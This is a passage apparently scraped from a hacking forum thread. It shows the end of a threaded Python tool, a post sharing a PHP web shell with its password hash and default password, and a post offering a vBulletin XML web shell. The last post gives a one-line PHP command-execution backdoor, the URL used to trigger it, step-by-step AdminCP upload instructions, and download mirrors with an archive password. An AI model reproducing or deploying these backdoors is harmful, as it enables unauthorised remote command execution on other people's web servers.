(`CHAR`<smth>) 
expand.append(open(argv[ind][1:], 'r')) # file objects else: command += ' ' + argv[ind] ind += 1 # process report.write("[+] Processing...\n") generate(command.strip(), expand, 0) while active_count() > 1: pass # wait for running threads report.write("[+] Done.\n") if __name__ == "__main__": main() Updated: 14.02.2012
  15. Edited. Download Link: shell.txt You can change the password here:--> @ $auth_pass = "DE65C26EE56EC4B20A6E86A1D7BB2BC5"; The password is encrypted in md5. Default pass: pgems.in Source: HackForums
  16. By TinKode
      Why did I create this (XML) Shell for vBulletin?! Hmm, because it's easier to use and works on all versions from 3.X to 4.X. I removed all PHP code, because vB 4.X had restricted these tags.
      The old method of editing a file like ajax.php to get RCE [Remote Command Execution], adding code to the source like <?php system($_GET['cmd']);?> and executing it like http://website.com/ajax.php?cmd=[RCE] no longer works on the 4.X versions!
      Instructions:
      Step 1: Go to AdminCP -> Styles & Templates section and choose Download / Upload Styles.
      Step 2: Click on the Browse button and find insecurity.xml, then select [Yes] for Ignore Style Version and click Import.
      Step 3: After you have uploaded the .XML Style, you can access it by clicking on the style like in the example.
      Downloads:
      Mirror: http://pastebin.com/ybZqXiDH
      Mirror: http://www.megaupload.com/?d=5DELFLQ3
      Password: ISR